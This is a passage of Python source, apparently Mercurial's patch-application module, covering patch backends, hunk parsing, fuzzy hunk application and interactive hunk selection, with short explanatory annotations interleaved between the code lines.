487     def setfile(self, fname, data, mode, copysource):
488         islink, isexec = mode
489         if data is None:
490             self.opener.setflags(fname, islink, isexec)
491             return
492         if islink:
493             self.opener.symlink(data, fname)
494         else:
495             self.opener.write(fname, data)
496         if isexec:
497             self.opener.setflags(fname, False, True)
498
499     def unlink(self, fname):
500         rmdir = self.ui.configbool('experimental', 'removeemptydirs')
501         self.opener.unlinkpath(fname, ignoremissing=True, rmdir=rmdir)
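(The experimental.removeemptydirs knob read here appears to default to on, so the pre-existing behaviour of pruning directories left empty by the unlink is kept unless it is explicitly disabled; roughly:)

    # sketch of the effect of the config read above
    rmdir = ui.configbool('experimental', 'removeemptydirs')
    # rmdir True  -> unlinkpath also removes now-empty parent directories
    # rmdir False -> only the file is unlinked; empty directories remain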
502
503     def writerej(self, fname, failed, total, lines):
504         fname = fname + ".rej"
505         self.ui.warn(
506             _("%d out of %d hunks FAILED -- saving rejects to file %s\n") %
507             (failed, total, fname))
508         fp = self.opener(fname, 'w')
509         fp.writelines(lines)
510         fp.close()
511
512     def exists(self, fname):
513         return self.opener.lexists(fname)
514
515 class workingbackend(fsbackend):
516     def __init__(self, ui, repo, similarity):
517         super(workingbackend, self).__init__(ui, repo.root)
518         self.repo = repo
519         self.similarity = similarity
520         self.removed = set()
521         self.changed = set()
522         self.copied = []
523
524     def _checkknown(self, fname):
525         if self.repo.dirstate[fname] == '?' and self.exists(fname):
526             raise PatchError(_('cannot patch %s: file is not tracked') % fname)
527
528     def setfile(self, fname, data, mode, copysource):
529         self._checkknown(fname)
530         super(workingbackend, self).setfile(fname, data, mode, copysource)
531         if copysource is not None:
532             self.copied.append((copysource, fname))
533         self.changed.add(fname)
534
535     def unlink(self, fname):
536         self._checkknown(fname)
537         super(workingbackend, self).unlink(fname)
538         self.removed.add(fname)
539         self.changed.add(fname)
540
541     def close(self):
542         wctx = self.repo[None]
543         changed = set(self.changed)
544         for src, dst in self.copied:
545             scmutil.dirstatecopy(self.ui, self.repo, wctx, src, dst)
546         if self.removed:
547             wctx.forget(sorted(self.removed))
548             for f in self.removed:
549                 if f not in self.repo.dirstate:
550                     # File was deleted and no longer belongs to the
551                     # dirstate, it was probably marked added then
552                     # deleted, and should not be considered by
553                     # marktouched().
554                     changed.discard(f)
555         if changed:
556             scmutil.marktouched(self.repo, changed, self.similarity)
557         return sorted(self.changed)
558
559 class filestore(object):
560     def __init__(self, maxsize=None):
561         self.opener = None
562         self.files = {}
563         self.created = 0
564         self.maxsize = maxsize
565         if self.maxsize is None:
566             self.maxsize = 4*(2**20)
567         self.size = 0
568         self.data = {}
569
570     def setfile(self, fname, data, mode, copied=None):
571         if self.maxsize < 0 or (len(data) + self.size) <= self.maxsize:
572             self.data[fname] = (data, mode, copied)
573             self.size += len(data)
574         else:
575             if self.opener is None:
576                 root = pycompat.mkdtemp(prefix='hg-patch-')
577                 self.opener = vfsmod.vfs(root)
578             # Avoid filename issues with these simple names
579             fn = '%d' % self.created
580             self.opener.write(fn, data)
581             self.created += 1
582             self.files[fname] = (fn, mode, copied)
583
584     def getfile(self, fname):
585         if fname in self.data:
586             return self.data[fname]
587         if not self.opener or fname not in self.files:
588             return None, None, None
589         fn, mode, copied = self.files[fname]
590         return self.opener.read(fn), mode, copied
591
592     def close(self):
593         if self.opener:
594             shutil.rmtree(self.opener.base)
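(filestore keeps small payloads in memory and spills to a temporary vfs once maxsize, 4 MiB unless overridden, would be exceeded; a sketch with a tiny limit:)

    store = filestore(maxsize=8)
    store.setfile('a', 'tiny', (False, False))     # 4 bytes: kept in memory
    store.setfile('b', 'x' * 100, (False, False))  # would overflow: spilled
    data, mode, copied = store.getfile('b')        # read back from the vfs
    store.close()                                  # removes the spill directory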
595
596 class repobackend(abstractbackend):
597     def __init__(self, ui, repo, ctx, store):
598         super(repobackend, self).__init__(ui)
599         self.repo = repo
600         self.ctx = ctx
601         self.store = store
602         self.changed = set()
603         self.removed = set()
604         self.copied = {}
605
606     def _checkknown(self, fname):
607         if fname not in self.ctx:
608             raise PatchError(_('cannot patch %s: file is not tracked') % fname)
609
610     def getfile(self, fname):
611         try:
612             fctx = self.ctx[fname]
613         except error.LookupError:
614             return None, None
615         flags = fctx.flags()
616         return fctx.data(), ('l' in flags, 'x' in flags)
617
618     def setfile(self, fname, data, mode, copysource):
619         if copysource:
620             self._checkknown(copysource)
621         if data is None:
622             data = self.ctx[fname].data()
623         self.store.setfile(fname, data, mode, copysource)
624         self.changed.add(fname)
625         if copysource:
626             self.copied[fname] = copysource
627
628     def unlink(self, fname):
629         self._checkknown(fname)
630         self.removed.add(fname)
631
632     def exists(self, fname):
633         return fname in self.ctx
634
635     def close(self):
636         return self.changed | self.removed
637
638 # @@ -start,len +start,len @@ or @@ -start +start @@ if len is 1
639 unidesc = re.compile('@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
640 contextdesc = re.compile('(?:---|\*\*\*) (\d+)(?:,(\d+))? (?:---|\*\*\*)')
641 eolmodes = ['strict', 'crlf', 'lf', 'auto']
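(For instance, a unified hunk header parses like this sketch:)

    m = unidesc.match('@@ -1,5 +2,6 @@')
    # m.group(1, 2, 3, 4) == ('1', '5', '2', '6'); for a one-line hunk such
    # as '@@ -1 +1 @@' the optional length groups come back as None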
642
643 class patchfile(object):
644     def __init__(self, ui, gp, backend, store, eolmode='strict'):
645         self.fname = gp.path
646         self.eolmode = eolmode
647         self.eol = None
648         self.backend = backend
649         self.ui = ui
650         self.lines = []
651         self.exists = False
652         self.missing = True
653         self.mode = gp.mode
654         self.copysource = gp.oldpath
655         self.create = gp.op in ('ADD', 'COPY', 'RENAME')
656         self.remove = gp.op == 'DELETE'
657         if self.copysource is None:
658             data, mode = backend.getfile(self.fname)
659         else:
660             data, mode = store.getfile(self.copysource)[:2]
661         if data is not None:
662             self.exists = self.copysource is None or backend.exists(self.fname)
663             self.missing = False
664             if data:
665                 self.lines = mdiff.splitnewlines(data)
666             if self.mode is None:
667                 self.mode = mode
668             if self.lines:
669                 # Normalize line endings
670                 if self.lines[0].endswith('\r\n'):
671                     self.eol = '\r\n'
672                 elif self.lines[0].endswith('\n'):
673                     self.eol = '\n'
674                 if eolmode != 'strict':
675                     nlines = []
676                     for l in self.lines:
677                         if l.endswith('\r\n'):
678                             l = l[:-2] + '\n'
679                         nlines.append(l)
680                     self.lines = nlines
681         else:
682             if self.create:
683                 self.missing = False
684             if self.mode is None:
685                 self.mode = (False, False)
686         if self.missing:
687             self.ui.warn(_("unable to find '%s' for patching\n") % self.fname)
688             self.ui.warn(_("(use '--prefix' to apply patch relative to the "
689                            "current directory)\n"))
690
691         self.hash = {}
692         self.dirty = 0
693         self.offset = 0
694         self.skew = 0
695         self.rej = []
696         self.fileprinted = False
697         self.printfile(False)
698         self.hunks = 0
699
700     def writelines(self, fname, lines, mode):
701         if self.eolmode == 'auto':
702             eol = self.eol
703         elif self.eolmode == 'crlf':
704             eol = '\r\n'
705         else:
706             eol = '\n'
707
708         if self.eolmode != 'strict' and eol and eol != '\n':
709             rawlines = []
710             for l in lines:
711                 if l and l.endswith('\n'):
712                     l = l[:-1] + eol
713                 rawlines.append(l)
714             lines = rawlines
715
716         self.backend.setfile(fname, ''.join(lines), mode, self.copysource)
717
718     def printfile(self, warn):
719         if self.fileprinted:
720             return
721         if warn or self.ui.verbose:
722             self.fileprinted = True
723         s = _("patching file %s\n") % self.fname
724         if warn:
725             self.ui.warn(s)
726         else:
727             self.ui.note(s)
728
729
730     def findlines(self, l, linenum):
731         # looks through the hash and finds candidate lines. The
732         # result is a list of line numbers sorted based on distance
733         # from linenum
734
735         cand = self.hash.get(l, [])
736         if len(cand) > 1:
737             # resort our list of potentials forward then back.
738             cand.sort(key=lambda x: abs(x - linenum))
739         return cand
740
741     def write_rej(self):
742         # our rejects are a little different from patch(1). This always
743         # creates rejects in the same form as the original patch. A file
744         # header is inserted so that you can run the reject through patch again
745         # without having to type the filename.
746         if not self.rej:
747             return
748         base = os.path.basename(self.fname)
749         lines = ["--- %s\n+++ %s\n" % (base, base)]
750         for x in self.rej:
751             for l in x.hunk:
752                 lines.append(l)
753                 if l[-1:] != '\n':
754                     lines.append("\n\ No newline at end of file\n")
755         self.backend.writerej(self.fname, len(self.rej), self.hunks, lines)
756
757     def apply(self, h):
758         if not h.complete():
759             raise PatchError(_("bad hunk #%d %s (%d %d %d %d)") %
760                              (h.number, h.desc, len(h.a), h.lena, len(h.b),
761                               h.lenb))
762
763         self.hunks += 1
764
765         if self.missing:
766             self.rej.append(h)
767             return -1
768
769         if self.exists and self.create:
770             if self.copysource:
771                 self.ui.warn(_("cannot create %s: destination already "
772                                "exists\n") % self.fname)
773             else:
774                 self.ui.warn(_("file %s already exists\n") % self.fname)
775             self.rej.append(h)
776             return -1
777
778         if isinstance(h, binhunk):
779             if self.remove:
780                 self.backend.unlink(self.fname)
781             else:
782                 l = h.new(self.lines)
783                 self.lines[:] = l
784                 self.offset += len(l)
785                 self.dirty = True
786             return 0
787
788         horig = h
789         if (self.eolmode in ('crlf', 'lf')
790             or self.eolmode == 'auto' and self.eol):
791             # If new eols are going to be normalized, then normalize
792             # hunk data before patching. Otherwise, preserve input
793             # line-endings.
794             h = h.getnormalized()
795
796         # fast case first, no offsets, no fuzz
797         old, oldstart, new, newstart = h.fuzzit(0, False)
798         oldstart += self.offset
799         orig_start = oldstart
800         # if there's skew we want to emit the "(offset %d lines)" even
801         # when the hunk cleanly applies at start + skew, so skip the
802         # fast case code
803         if self.skew == 0 and diffhelper.testhunk(old, self.lines, oldstart):
804             if self.remove:
805                 self.backend.unlink(self.fname)
806             else:
807                 self.lines[oldstart:oldstart + len(old)] = new
808                 self.offset += len(new) - len(old)
809                 self.dirty = True
810             return 0
811
812         # ok, we couldn't match the hunk. Let's look for offsets and fuzz it
813         self.hash = {}
814         for x, s in enumerate(self.lines):
815             self.hash.setdefault(s, []).append(x)
816
817         for fuzzlen in xrange(self.ui.configint("patch", "fuzz") + 1):
818             for toponly in [True, False]:
819                 old, oldstart, new, newstart = h.fuzzit(fuzzlen, toponly)
820                 oldstart = oldstart + self.offset + self.skew
821                 oldstart = min(oldstart, len(self.lines))
822                 if old:
823                     cand = self.findlines(old[0][1:], oldstart)
824                 else:
825                     # Only adding lines with no or fuzzed context, just
826                     # take the skew into account
827                     cand = [oldstart]
828
829                 for l in cand:
830                     if not old or diffhelper.testhunk(old, self.lines, l):
831                         self.lines[l : l + len(old)] = new
832                         self.offset += len(new) - len(old)
833                         self.skew = l - orig_start
834                         self.dirty = True
835                         offset = l - orig_start - fuzzlen
836                         if fuzzlen:
837                             msg = _("Hunk #%d succeeded at %d "
838                                     "with fuzz %d "
839                                     "(offset %d lines).\n")
840                             self.printfile(True)
841                             self.ui.warn(msg %
842                                 (h.number, l + 1, fuzzlen, offset))
843                         else:
844                             msg = _("Hunk #%d succeeded at %d "
845                                     "(offset %d lines).\n")
846                             self.ui.note(msg % (h.number, l + 1, offset))
847                         return fuzzlen
848         self.printfile(True)
849         self.ui.warn(_("Hunk #%d FAILED at %d\n") % (h.number, orig_start))
850         self.rej.append(horig)
851         return -1
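(Reading the loop above: fuzz widens one step at a time up to the patch.fuzz config value, each step apparently trying a top-only context trim before trimming both ends, and candidates nearest the expected position are probed first; a sketch of the search order:)

    # for fuzzlen in 0 .. ui.configint("patch", "fuzz"):
    #     for toponly in (True, False):
    #         probe candidate lines sorted by distance from
    #         oldstart + self.offset + self.skew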
852
853     def close(self):
854         if self.dirty:
855             self.writelines(self.fname, self.lines, self.mode)
856         self.write_rej()
857         return len(self.rej)
858
859 class header(object):
860     """patch header
861     """
862     diffgit_re = re.compile('diff --git a/(.*) b/(.*)$')
863     diff_re = re.compile('diff -r .* (.*)$')
864     allhunks_re = re.compile('(?:index|deleted file) ')
865     pretty_re = re.compile('(?:new file|deleted file) ')
866     special_re = re.compile('(?:index|deleted|copy|rename) ')
867     newfile_re = re.compile('(?:new file)')
868
869     def __init__(self, header):
870         self.header = header
871         self.hunks = []
872
873     def binary(self):
874         return any(h.startswith('index ') for h in self.header)
875
876     def pretty(self, fp):
877         for h in self.header:
878             if h.startswith('index '):
879                 fp.write(_('this modifies a binary file (all or nothing)\n'))
880                 break
881             if self.pretty_re.match(h):
882                 fp.write(h)
883                 if self.binary():
884                     fp.write(_('this is a binary file\n'))
885                 break
886             if h.startswith('---'):
887                 fp.write(_('%d hunks, %d lines changed\n') %
888                          (len(self.hunks),
889                           sum([max(h.added, h.removed) for h in self.hunks])))
890                 break
891             fp.write(h)
892
893     def write(self, fp):
894         fp.write(''.join(self.header))
895
896     def allhunks(self):
897         return any(self.allhunks_re.match(h) for h in self.header)
898
899     def files(self):
900         match = self.diffgit_re.match(self.header[0])
901         if match:
902             fromfile, tofile = match.groups()
903             if fromfile == tofile:
904                 return [fromfile]
905             return [fromfile, tofile]
906         else:
907             return self.diff_re.match(self.header[0]).groups()
908
909     def filename(self):
910         return self.files()[-1]
911
912     def __repr__(self):
913         return '<header %s>' % (' '.join(map(repr, self.files())))
914
915     def isnewfile(self):
916         return any(self.newfile_re.match(h) for h in self.header)
917
918     def special(self):
919         # Special files are shown only at the header level and not at the
920         # hunk level; for example, a file that has been deleted is a
921         # special file. The user cannot change the content of the
922         # operation: in the case of a deleted file, they have to take the
923         # deletion or not take it, they cannot take only some of it.
924         # Newly added files are special if they are empty; they are not
925         # special if they have some content, as we want to be able to change it.
926         nocontent = len(self.header) == 2
927         emptynewfile = self.isnewfile() and nocontent
928         return emptynewfile or \
929                 any(self.special_re.match(h) for h in self.header)
930
931 class recordhunk(object):
932     """patch hunk
933
934     XXX shouldn't we merge this with the other hunk class?
935     """
936
937     def __init__(self, header, fromline, toline, proc, before, hunk, after,
938                  maxcontext=None):
939         def trimcontext(lines, reverse=False):
940             if maxcontext is not None:
941                 delta = len(lines) - maxcontext
942                 if delta > 0:
943                     if reverse:
944                         return delta, lines[delta:]
945                     else:
946                         return delta, lines[:maxcontext]
947             return 0, lines
948
949         self.header = header
950         trimedbefore, self.before = trimcontext(before, True)
951         self.fromline = fromline + trimedbefore
952         self.toline = toline + trimedbefore
953         _trimedafter, self.after = trimcontext(after, False)
954         self.proc = proc
955         self.hunk = hunk
956         self.added, self.removed = self.countchanges(self.hunk)
957
958     def __eq__(self, v):
959         if not isinstance(v, recordhunk):
960             return False
961
962         return ((v.hunk == self.hunk) and
963                 (v.proc == self.proc) and
964                 (self.fromline == v.fromline) and
965                 (self.header.files() == v.header.files()))
966
967     def __hash__(self):
968         return hash((tuple(self.hunk),
969                      tuple(self.header.files()),
970                      self.fromline,
971                      self.proc))
972
973     def countchanges(self, hunk):
974         """hunk -> (n+,n-)"""
975         add = len([h for h in hunk if h.startswith('+')])
976         rem = len([h for h in hunk if h.startswith('-')])
977         return add, rem
978
979     def reversehunk(self):
980         """return another recordhunk which is the reverse of the hunk
981
982         If this hunk is diff(A, B), the returned hunk is diff(B, A). To do
983         that, swap fromline/toline and +/- signs while keeping other things
984         unchanged.
985         """
986         m = {'+': '-', '-': '+', '\\': '\\'}
987         hunk = ['%s%s' % (m[l[0:1]], l[1:]) for l in self.hunk]
988         return recordhunk(self.header, self.toline, self.fromline, self.proc,
989                           self.before, hunk, self.after)
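(So a hunk body like ['-old\n', '+new\n'] comes back as ['+old\n', '-new\n'], with '\\'-continuation lines passed through unchanged; a sketch, where `somehunk` is any recordhunk instance:)

    rev = somehunk.reversehunk()
    # rev.fromline/rev.toline are swapped relative to somehunk, and every
    # '+' line became a '-' line and vice versa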
990
991     def write(self, fp):
992         delta = len(self.before) + len(self.after)
993         if self.after and self.after[-1] == '\\ No newline at end of file\n':
994             delta -= 1
995         fromlen = delta + self.removed
996         tolen = delta + self.added
997         fp.write('@@ -%d,%d +%d,%d @@%s\n' %
998                  (self.fromline, fromlen, self.toline, tolen,
999                   self.proc and (' ' + self.proc)))
1000         fp.write(''.join(self.before + self.hunk + self.after))
1001
1002     pretty = write
1003
1004     def filename(self):
1005         return self.header.filename()
1006
1007     def __repr__(self):
1008         return '<hunk %r@%d>' % (self.filename(), self.fromline)
1009
1010 def getmessages():
1011     return {
1012         'multiple': {
1013             'apply': _("apply change %d/%d to '%s'?"),
1014             'discard': _("discard change %d/%d to '%s'?"),
1015             'record': _("record change %d/%d to '%s'?"),
1016         },
1017         'single': {
1018             'apply': _("apply this change to '%s'?"),
1019             'discard': _("discard this change to '%s'?"),
1020             'record': _("record this change to '%s'?"),
1021         },
1022         'help': {
1023             'apply': _('[Ynesfdaq?]'
1024                        '$$ &Yes, apply this change'
1025                        '$$ &No, skip this change'
1026                        '$$ &Edit this change manually'
1027                        '$$ &Skip remaining changes to this file'
1028                        '$$ Apply remaining changes to this &file'
1029                        '$$ &Done, skip remaining changes and files'
1030                        '$$ Apply &all changes to all remaining files'
1031                        '$$ &Quit, applying no changes'
1032                        '$$ &? (display help)'),
1033             'discard': _('[Ynesfdaq?]'
1034                          '$$ &Yes, discard this change'
1035                          '$$ &No, skip this change'
1036                          '$$ &Edit this change manually'
1037                          '$$ &Skip remaining changes to this file'
1038                          '$$ Discard remaining changes to this &file'
1039                          '$$ &Done, skip remaining changes and files'
1040                          '$$ Discard &all changes to all remaining files'
1041                          '$$ &Quit, discarding no changes'
1042                          '$$ &? (display help)'),
1043             'record': _('[Ynesfdaq?]'
1044                         '$$ &Yes, record this change'
1045                         '$$ &No, skip this change'
1046                         '$$ &Edit this change manually'
1047                         '$$ &Skip remaining changes to this file'
1048                         '$$ Record remaining changes to this &file'
1049                         '$$ &Done, skip remaining changes and files'
1050                         '$$ Record &all changes to all remaining files'
1051                         '$$ &Quit, recording no changes'
1052                         '$$ &? (display help)'),
1053         }
1054     }
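(These tables feed ui.promptchoice() in filterpatch() below; e.g. the single-change record prompt would be assembled like this sketch:)

    msgs = getmessages()
    query = msgs['single']['record'] % 'somefile.py'
    # -> "record this change to 'somefile.py'?"
    resps = msgs['help']['record']  # '$$'-separated choices for promptchoice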
1054
1055
def filterpatch(ui, headers, operation=None):
    """Interactively filter patch chunks into applied-only chunks"""
    messages = getmessages()

    if operation is None:
        operation = 'record'

    def prompt(skipfile, skipall, query, chunk):
        """prompt query, and process base inputs

        - y/n for the rest of file
        - y/n for the rest
        - ? (help)
        - q (quit)

        Return True/False and possibly updated skipfile and skipall.
        """
        newpatches = None
        if skipall is not None:
            return skipall, skipfile, skipall, newpatches
        if skipfile is not None:
            return skipfile, skipfile, skipall, newpatches
        while True:
            resps = messages['help'][operation]
            r = ui.promptchoice("%s %s" % (query, resps))
            ui.write("\n")
            if r == 8: # ?
                for c, t in ui.extractchoices(resps)[1]:
                    ui.write('%s - %s\n' % (c, encoding.lower(t)))
                continue
            elif r == 0: # yes
                ret = True
            elif r == 1: # no
                ret = False
            elif r == 2: # Edit patch
                if chunk is None:
                    ui.write(_('cannot edit patch for whole file'))
                    ui.write("\n")
                    continue
                if chunk.header.binary():
                    ui.write(_('cannot edit patch for binary file'))
                    ui.write("\n")
                    continue
                # Patch comment based on the Git one (based on comment at end of
                # https://mercurial-scm.org/wiki/RecordExtension)
                phelp = '---' + _("""
To remove '-' lines, make them ' ' lines (context).
To remove '+' lines, delete them.
Lines starting with # will be removed from the patch.

If the patch applies cleanly, the edited hunk will immediately be
added to the record list. If it does not apply cleanly, a rejects
file will be generated: you can use that when you try again. If
all lines of the hunk are removed, then the edit is aborted and
the hunk is left unchanged.
""")
                (patchfd, patchfn) = pycompat.mkstemp(prefix="hg-editor-",
                                                      suffix=".diff")
                ncpatchfp = None
                try:
                    # Write the initial patch
                    f = util.nativeeolwriter(os.fdopen(patchfd, r'wb'))
                    chunk.header.write(f)
                    chunk.write(f)
                    f.write('\n'.join(['# ' + i for i in phelp.splitlines()]))
                    f.close()
                    # Start the editor and wait for it to complete
                    editor = ui.geteditor()
                    ret = ui.system("%s \"%s\"" % (editor, patchfn),
                                    environ={'HGUSER': ui.username()},
                                    blockedtag='filterpatch')
                    if ret != 0:
                        ui.warn(_("editor exited with exit code %d\n") % ret)
                        continue
                    # Remove comment lines
                    patchfp = open(patchfn, r'rb')
                    ncpatchfp = stringio()
                    for line in util.iterfile(patchfp):
                        line = util.fromnativeeol(line)
                        if not line.startswith('#'):
                            ncpatchfp.write(line)
                    patchfp.close()
                    ncpatchfp.seek(0)
                    newpatches = parsepatch(ncpatchfp)
                finally:
                    os.unlink(patchfn)
                    del ncpatchfp
                # Signal that the chunk shouldn't be applied as-is, but
                # provide the new patch to be used instead.
                ret = False
            elif r == 3: # Skip
                ret = skipfile = False
            elif r == 4: # file (Record remaining)
                ret = skipfile = True
            elif r == 5: # done, skip remaining
                ret = skipall = False
            elif r == 6: # all
                ret = skipall = True
            elif r == 7: # quit
                raise error.Abort(_('user quit'))
            return ret, skipfile, skipall, newpatches

    seen = set()
    applied = {} # 'filename' -> [] of chunks
    skipfile, skipall = None, None
    pos, total = 1, sum(len(h.hunks) for h in headers)
    for h in headers:
        pos += len(h.hunks)
        skipfile = None
        fixoffset = 0
        hdr = ''.join(h.header)
        if hdr in seen:
            continue
        seen.add(hdr)
        if skipall is None:
            h.pretty(ui)
        msg = (_('examine changes to %s?') %
               _(' and ').join("'%s'" % f for f in h.files()))
        r, skipfile, skipall, np = prompt(skipfile, skipall, msg, None)
        if not r:
            continue
        applied[h.filename()] = [h]
        if h.allhunks():
            applied[h.filename()] += h.hunks
            continue
        for i, chunk in enumerate(h.hunks):
            if skipfile is None and skipall is None:
                chunk.pretty(ui)
            if total == 1:
                msg = messages['single'][operation] % chunk.filename()
            else:
                idx = pos - len(h.hunks) + i
                msg = messages['multiple'][operation] % (idx, total,
                                                         chunk.filename())
            r, skipfile, skipall, newpatches = prompt(skipfile,
                    skipall, msg, chunk)
            if r:
                if fixoffset:
                    chunk = copy.copy(chunk)
                    chunk.toline += fixoffset
                applied[chunk.filename()].append(chunk)
            elif newpatches is not None:
                for newpatch in newpatches:
                    for newhunk in newpatch.hunks:
                        if fixoffset:
                            newhunk.toline += fixoffset
                        applied[newhunk.filename()].append(newhunk)
            else:
                fixoffset += chunk.removed - chunk.added
    return (sum([h for h in applied.itervalues()
                 if h[0].special() or len(h) > 1], []), {})
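
# The value returned above is a (chunks, opts) pair: sum(..., []) is plain
# list concatenation, flattening the per-file [header, hunk, ...] lists and
# dropping files where only the header was picked (length 1 and not a
# special header such as a rename). For example:
#
#     sum([['hdr-a', 'hunk-a1'], ['hdr-b', 'hunk-b1']], [])
#     # -> ['hdr-a', 'hunk-a1', 'hdr-b', 'hunk-b1']
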
class hunk(object):
    def __init__(self, desc, num, lr, context):
        self.number = num
        self.desc = desc
        self.hunk = [desc]
        self.a = []
        self.b = []
        self.starta = self.lena = None
        self.startb = self.lenb = None
        if lr is not None:
            if context:
                self.read_context_hunk(lr)
            else:
                self.read_unified_hunk(lr)

    def getnormalized(self):
        """Return a copy with line endings normalized to LF."""

        def normalize(lines):
            nlines = []
            for line in lines:
                if line.endswith('\r\n'):
                    line = line[:-2] + '\n'
                nlines.append(line)
            return nlines

        # Dummy object, it is rebuilt manually
        nh = hunk(self.desc, self.number, None, None)
        nh.number = self.number
        nh.desc = self.desc
        nh.hunk = self.hunk
        nh.a = normalize(self.a)
        nh.b = normalize(self.b)
        nh.starta = self.starta
        nh.startb = self.startb
        nh.lena = self.lena
        nh.lenb = self.lenb
        return nh

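    # getnormalized() only rewrites CRLF endings on the copied a/b lists,
    # e.g. normalize(['keep\n', 'fix\r\n']) -> ['keep\n', 'fix\n']; lines
    # with a bare '\r' or no terminator pass through unchanged.
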
    def read_unified_hunk(self, lr):
        m = unidesc.match(self.desc)
        if not m:
            raise PatchError(_("bad hunk #%d") % self.number)
        self.starta, self.lena, self.startb, self.lenb = m.groups()
        if self.lena is None:
            self.lena = 1
        else:
            self.lena = int(self.lena)
        if self.lenb is None:
            self.lenb = 1
        else:
            self.lenb = int(self.lenb)
        self.starta = int(self.starta)
        self.startb = int(self.startb)
        try:
            diffhelper.addlines(lr, self.hunk, self.lena, self.lenb,
                                self.a, self.b)
        except error.ParseError as e:
            raise PatchError(_("bad hunk #%d: %s") % (self.number, e))
        # if we hit eof before finishing out the hunk, the last line will
        # be zero length. Let's try to fix it up.
        while len(self.hunk[-1]) == 0:
            del self.hunk[-1]
            del self.a[-1]
            del self.b[-1]
            self.lena -= 1
            self.lenb -= 1
        self._fixnewline(lr)

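    # The range line parsed above looks like '@@ -1,7 +1,7 @@'; a
    # self-contained equivalent of the module-level unidesc regex (the exact
    # pattern here is an assumption, written to match how m.groups() is
    # unpacked above, with both lengths optional):
    #
    #     _unidesc = re.compile(br'@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
    #     _unidesc.match(b'@@ -1,7 +1,7 @@').groups()  # (b'1', b'7', b'1', b'7')
    #     _unidesc.match(b'@@ -3 +4 @@').groups()      # (b'3', None, b'4', None)
    #
    # which is why a missing length defaults to 1 above.
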
    def read_context_hunk(self, lr):
        self.desc = lr.readline()
        m = contextdesc.match(self.desc)
        if not m:
            raise PatchError(_("bad hunk #%d") % self.number)
        self.starta, aend = m.groups()
        self.starta = int(self.starta)
        if aend is None:
            aend = self.starta
        self.lena = int(aend) - self.starta
        if self.starta:
            self.lena += 1
        for x in xrange(self.lena):
            l = lr.readline()
            if l.startswith('---'):
                # lines addition, old block is empty
                lr.push(l)
                break
            s = l[2:]
            if l.startswith('- ') or l.startswith('! '):
                u = '-' + s
            elif l.startswith('  '):
                u = ' ' + s
            else:
                raise PatchError(_("bad hunk #%d old text line %d") %
                                 (self.number, x))
            self.a.append(u)
            self.hunk.append(u)

        l = lr.readline()
        if l.startswith('\ '):
            s = self.a[-1][:-1]
            self.a[-1] = s
            self.hunk[-1] = s
            l = lr.readline()
        m = contextdesc.match(l)
        if not m:
            raise PatchError(_("bad hunk #%d") % self.number)
        self.startb, bend = m.groups()
        self.startb = int(self.startb)
        if bend is None:
            bend = self.startb
        self.lenb = int(bend) - self.startb
        if self.startb:
            self.lenb += 1
        hunki = 1
        for x in xrange(self.lenb):
            l = lr.readline()
            if l.startswith('\ '):
                # XXX: the only way to hit this is with an invalid line range.
                # The no-eol marker is not counted in the line range, but I
                # guess there are diff(1) out there which behave differently.
                s = self.b[-1][:-1]
                self.b[-1] = s
                self.hunk[hunki - 1] = s
                continue
            if not l:
                # line deletions, new block is empty and we hit EOF
                lr.push(l)
                break
            s = l[2:]
            if l.startswith('+ ') or l.startswith('! '):
                u = '+' + s
            elif l.startswith('  '):
                u = ' ' + s
            elif len(self.b) == 0:
                # line deletions, new block is empty
                lr.push(l)
                break
            else:
                raise PatchError(_("bad hunk #%d old text line %d") %
                                 (self.number, x))
            self.b.append(s)
            while True:
                if hunki >= len(self.hunk):
                    h = ""
                else:
                    h = self.hunk[hunki]
                hunki += 1
                if h == u:
                    break
                elif h.startswith('-'):
                    continue
                else:
                    self.hunk.insert(hunki - 1, u)
                    break

        if not self.a:
            # this happens when lines were only added to the hunk
            for x in self.hunk:
                if x.startswith('-') or x.startswith(' '):
                    self.a.append(x)
        if not self.b:
            # this happens when lines were only deleted from the hunk
            for x in self.hunk:
                if x.startswith('+') or x.startswith(' '):
                    self.b.append(x[1:])
        # @@ -start,len +start,len @@
        self.desc = "@@ -%d,%d +%d,%d @@\n" % (self.starta, self.lena,
                                               self.startb, self.lenb)
        self.hunk[0] = self.desc
        self._fixnewline(lr)

    def _fixnewline(self, lr):
        l = lr.readline()
        if l.startswith('\ '):
            diffhelper.fixnewline(self.hunk, self.a, self.b)
        else:
            lr.push(l)

    def complete(self):
        return len(self.a) == self.lena and len(self.b) == self.lenb

    def _fuzzit(self, old, new, fuzz, toponly):
        # this removes context lines from the top and bottom of list 'l'. It
        # checks the hunk to make sure only context lines are removed, and then
        # returns a new shortened list of lines.
        fuzz = min(fuzz, len(old))
        if fuzz:
            top = 0
            bot = 0
            hlen = len(self.hunk)
            for x in xrange(hlen - 1):
                # the hunk starts with the @@ line, so use x+1
                if self.hunk[x + 1].startswith(' '):
                    top += 1
                else:
                    break
            if not toponly:
                for x in xrange(hlen - 1):
                    if self.hunk[hlen - bot - 1].startswith(' '):
                        bot += 1
                    else:
                        break

            bot = min(fuzz, bot)
            top = min(fuzz, top)
            return old[top:len(old) - bot], new[top:len(new) - bot], top
        return old, new, 0

    def fuzzit(self, fuzz, toponly):
        old, new, top = self._fuzzit(self.a, self.b, fuzz, toponly)
        oldstart = self.starta + top
        newstart = self.startb + top
        # zero length hunk ranges already have their start decremented
        if self.lena and oldstart > 0:
            oldstart -= 1
        if self.lenb and newstart > 0:
            newstart -= 1
        return old, oldstart, new, newstart

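# Fuzzing in the two methods above works like GNU patch's --fuzz: with
# fuzz=2, up to two leading and two trailing context lines are dropped
# before another apply attempt, and the reported start offset moves down by
# the number of lines trimmed from the top. For a hunk whose body (after
# the @@ line) is [' ctx1', ' ctx2', '-old', '+new', ' ctx3'], only the
# ' ctx*' runs at either end are candidates; '-'/'+' lines are never
# removed.
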
class binhunk(object):
    'A binary patch file.'
    def __init__(self, lr, fname):
        self.text = None
        self.delta = False
        self.hunk = ['GIT binary patch\n']
        self._fname = fname
        self._read(lr)

    def complete(self):
        return self.text is not None

    def new(self, lines):
        if self.delta:
            return [applybindelta(self.text, ''.join(lines))]
        return [self.text]

    def _read(self, lr):
        def getline(lr, hunk):
            l = lr.readline()
            hunk.append(l)
            return l.rstrip('\r\n')

        size = 0
        while True:
            line = getline(lr, self.hunk)
            if not line:
                raise PatchError(_('could not extract "%s" binary data')
                                 % self._fname)
            if line.startswith('literal '):
                size = int(line[8:].rstrip())
                break
            if line.startswith('delta '):
                size = int(line[6:].rstrip())
                self.delta = True
                break
        dec = []
        line = getline(lr, self.hunk)
        while len(line) > 1:
            l = line[0:1]
